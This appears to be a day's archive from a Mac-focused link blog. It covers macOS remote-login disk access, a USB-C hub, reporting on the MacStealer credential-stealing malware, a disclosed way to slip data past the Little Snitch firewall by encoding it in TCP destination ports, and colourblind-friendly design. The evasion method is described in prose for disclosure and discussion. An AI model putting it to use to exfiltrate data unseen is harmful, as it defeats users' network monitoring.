Archive for April 28, 2023

Friday, April 28, 2023

Allowing a Remote Computer to Access Your Mac


Turn on Remote Login to access your Mac from another computer using SSH (Secure Shell Protocol) or SFTP (SSH File Transfer Protocol).

This had been working for me for a long time, but at some point something happened to my TCC database and then rsync started failing:

rsync: opendir "/Users/mjt/Documents/C-Command/." failed: Operation not permitted (1)
rsync: failed to set times on "/Users/mjt/Documents/Code/Git": Operation not permitted (1)

This looked like a Full Disk Access problem, but the old solution of adding sshd and rsync to System Settings ‣ Privacy & Security ‣ Full Disk Access didn’t help.

The trick is that there’s now a separate Allow full disk access for remote users setting, but it’s under General ‣ Sharing instead of Privacy & Security ‣ Full Disk Access. And it’s now only visible if you click the little i button next to Remote Login. With this selected, you don’t need to give sshd Full Disk Access.

There is no corresopnding setting in the i next to File Sharing, so perhaps you still have to give smbd Full Disk Access manually.


Belkin Connect USB-C Hub

Juli Clover:

Popular Apple accessory maker Belkin recently introduced the Connect 4-Port USB-C Hub, which is the company’s first U.S. product made from post-consumer recycled plastics (PCR).


Made to be compact, the hub includes four USB-C 3.2 Gen 2 ports, and it supports pass-through charging of up to 100W.


Belkin says that its new USB-C hub is the only hub on the market able to deliver a maximum of 10Gb/s, which is 2x faster than other available hubs.

This seems like a pretty good deal at $44.99, but if you use one port for PD it really only gives you an additional two USB-C ports. We’re now about eight years into this transition, and there still seems to be no way to attach a large number of USB-C devices without using adapters.

My peripherals still use a mix of ports. Hotels and other public charging places use mostly USB-A. These days I’m carrying cables and adapters for USB-A, USB-C, Micro-USB, Lightning, MagSafe, and Apple Watch. Some devices need multiple cables, because sometimes I want to charge them from my MacBook Pro (USB-C only) but other times from USB-A.


Update (2023-05-01): This is not the first such hub, as I mentioned the Sitecom CN-386 three years ago. However, the reviews for that one weren’t great; I have more faith in this one given Belkin’s reputation. Marco Arment says that perhaps the lack of USB-C hubs with lots of ports is due to the inability to support so many full-speed connections. If so, I would certainly welcome hubs with a mix of fast and slow ports, as were common with earlier versions of USB. That complexity would be a small price to pay to get more ports—and not need to use adapters or daisy-chain hubs.

MacStealer Malware

Jovi Umawing (Hacker News, MacRumors):

Users are manipulated to download and execute this file onto their systems. Once achieved, a bogus password prompts users in an attempt to steal their real password. MacStealer then saves the password in the affected system’s temporary folder (TMP).

The malware then proceeds to collect and save the following also within the TMP folder:

  • Account passwords, browser cookies, and stored credit card details in Firefox, Chrome, and Brave
  • Cryptocurrency wallets (Binance, Coinomi, Exodus, Keplr Wallet, Martian Wallet, MetaMask, Phantom, Tron, Trust Wallet)
  • Keychain database in its encoded (base64)form
  • Keychain password in text format


MacStealer being an unsigned DMG file is also a barrier for anyone, especially beginners, attempting to run the program on a modern mac, said Malwarebytes’ Reed. “Its attempt at phishing for login passwords is not very convincing and would probably only fool a novice user. But such a user is exactly the type who would have trouble opening it.”

I wonder whether this last point means to say that the app is unsigned or unnotarized. An unsigned disk image is not more difficult to open. It just means that the app will run under translocation, which doesn’t seem like it would provide any protection in this case.

I’m surprised we haven’t heard about more malware like this.


Bypassing Little Snitch With Empty TCP Packets

Jeff Johnson:

When you look at the implementation of Little Snitch, the interpretation of the word “data” becomes crucial. Technically, unless you allow the connection, Little Snitch does indeed prevent HTTP data from getting sent. Nonetheless, Little Snitch does not prevent TCP (Transmission Control Protocol) data from getting sent. This TCP data includes your IP address, which can often be used to personally identify you. The server knows that you, i.e., your IP address, tried to connect to the server, even when Little Snitch “denies” the connection.


Objective Development told me that Little Snitch uses deep packet inspection to try to get a name for the connection.


An HTTP connection over TCP has to initiate a 3-step “handshake” before any actual data—such as HTTP headers—can be sent over the connection. Every TCP packet, including any packet involved in the handshake, contains the IP addresses of the sender and the receiver.

Ryan Gerstenkorn:

If you set up a TCP connection and close it before sending any data, an alert will not be triggered by Little Snitch.


This behavior is enough to enable two-way communications between a server and a client running behind Little Snitch without being detected by using the destination port to encode data.


To demonstrate exfiltrating data we will be encoding it across eight ports where each port maps to a bit in memory. All bits default to zero, when a connection is established to port X, the associated bit X is set to one. Once we have made all the connections needed, and the bits are set correctly in memory, we can then send a connection to a ninth port, indicating to the server that the current cycle is complete. The current byte is read, flushed to stdout, and the server state is then reset.

Jeff Johnson:

The addendum of the blog post notes that I had briefly tested LuLu and saw some of the same behavior. After I published my blog post, I sent a link to Patrick Wardle, the developer of LuLu, who has been very responsive and helpful. Moreover, LuLu is open source, so I was able to examine how it works exactly. On further testing with LuLu, I came to believe that there’s actually a bug in the macOS network filter extension implementation. I’ve now filed FB12088655 with Apple: Privacy: Network filter extension TCP connection and IP address leak.

Update (2023-06-09): Christian Bender:

Since we are no longer allowed to ship a kernel extension, we are required to code against this new programming interface. So the question transforms into: “Why does the Network Extension framework allow these data packets?”


The clever move is to run two tasks in parallel: While the three-way handshake is in progress, Apple simultaneously asks all Network Extensions whether to allow or deny the connection. The Network Extensions have at least 20 milliseconds time to respond without degrading performance. That just enough to run complex filters and send responses back to the kernel. The downside is, of course, that the server receives the SYN packet. If it turns out that the packet should be denied, a RST (Reset) packet is sent instead of the SYN/ACK to abort the connection.


We tried to report a successful connect to the app, although the handshake packets were held back. This resulted in an inconsistency in the TCP/IP implementation of the kernel and triggered either a kernel panic or various other errors. […] We therefore assume that it’s hard, even for Apple, to inspect the first data packet without allowing at least the initial handshake.


Considering the different types of attackers, it is unlikely that exploiting the TCP SYN packet will be widely used for large-scale attacks targeting multiple computers. […] However, this method could be of interest to user tracking and analytics, allowing them to gather rough information about installations and some aspects of user behavior. […] It would be naive to think that Little Snitch alone can protect you from [targeted attacks].

Update (2023-06-13): Jeff Johnson (Mastodon):

I’m not persuaded that performance over privacy is a good tradeoff for network extension users. And we don’t even get the choice. Apple is imposing its decision on everyone, with no options. And speaking of performance, do you know what else can degrade it? iCloud Private Relay! […] Additional latency may be the price of protecting your privacy, and that’s a price I’m willing to pay.


Safari is never waiting on the content blocking extension to provide a verdict on individual URL loads.

It seems to me that Apple could do network content filter extensions the same way. Why couldn’t Little Snitch provide its rules to the kernel in advance and let the kernel itself do all of the filtering, without having to switch contexts?


One of the questions I raised in my blog posts was not answered by Objective Development: why does Little Snitch leak your IP address on every TCP connection attempt, when LuLu and my own sample network filter extension do not?

Designing for Colorblindness

Andy Baio:

For some people, colorblindness is a serious liability that closes doors on career dreams. It’s hard to become a pilot, train conductor, or pathologist if you can’t differentiate colors in critical instruments, signals, or tissue samples. For others, it seriously impacts their day-to-day ability to do their jobs, like surveyors spotting flags, doctors looking at skin conditions, or electricians looking for colored wires.

But for me, it’s just a lifelong series of unnecessarily confusing interactions, demonstrating that the world wasn’t designed for people like me.

Jason Snell:

Basically, Tot’s launch screen was utterly baffling to me because I’m (mildly) colorblind and it was asking me to do things based on whether a tiny ring was green or red. I couldn’t see it.

Craig Hockenberry:

The initial releases of Tot didn’t have great accessibility. We knew it needed improving, but experience has shown us the folks who need these features have great ideas and happily share their opinions.


Luckily we have a tool that let me approximate what Jason was seeing. xScope’s vision defect simulator confirmed that Tot’s colored circles had serious issues.